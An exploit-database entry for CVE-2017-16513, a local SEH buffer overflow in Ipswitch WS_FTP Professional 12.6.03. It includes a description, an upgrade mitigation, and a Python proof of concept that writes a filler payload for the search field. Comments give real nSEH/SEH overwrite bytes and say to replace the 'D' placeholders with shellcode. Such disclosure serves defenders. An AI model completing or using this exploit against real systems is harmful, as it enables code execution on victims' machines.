Vendor: WS_FTP Professional
By: Kevin McGuigan
CVSS: 7.8 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: WS_FTP Professional
Affected Version From: 12.6.03
Affected Version To: 12.6.03
Patch Exists: YES
Related CVE: CVE-2017-16513
CPE: a:ipswitch:ws_ftp_professional
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 32-bit
2017

Ipswitch WS_FTP Professional Local Buffer Overflow (SEH)

A buffer overflow vulnerability exists in Ipswitch WS_FTP Professional version 12.6.03. An attacker can exploit it by supplying a specially crafted payload to the search field, which overwrites the structured exception handler (SEH) record and can lead to arbitrary code execution. The payload is generated with a script and pasted into the search field; the trailing 'D' characters are a placeholder that is replaced with shellcode.

Mitigation:

Upgrade to the latest version of Ipswitch WS_FTP Professional.

Exploit-DB raw data:

#!/usr/bin/python
#Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH)
#Author: Kevin McGuigan. Twitter: @_h3xagram
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.ipswitch.com
#Date: 03/11/2017
#Version: 12.6.03
#CVE: CVE-2017-16513
#Tested on: Windows 7 32-bit
#Use script to generate payload. Paste payload into search field, replace Ds with shellcode. 
#nSEH = "\x74\x08\x90\x90" 
#SEH = "\x31\x2D\x91\x23"

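# Filler layout of the proof-of-concept input: 840 bytes of padding,
# followed by 4-byte placeholders for the nSEH and SEH fields.
buffer = "A" * 840
nSEH = "B" * 4
SEH = "C" * 4

# Write the pattern to poc.txt; the trailing "D" run marks the space after SEH.
with open("poc.txt", "w") as f:
    f.write(buffer + nSEH + SEH + "D" * 200)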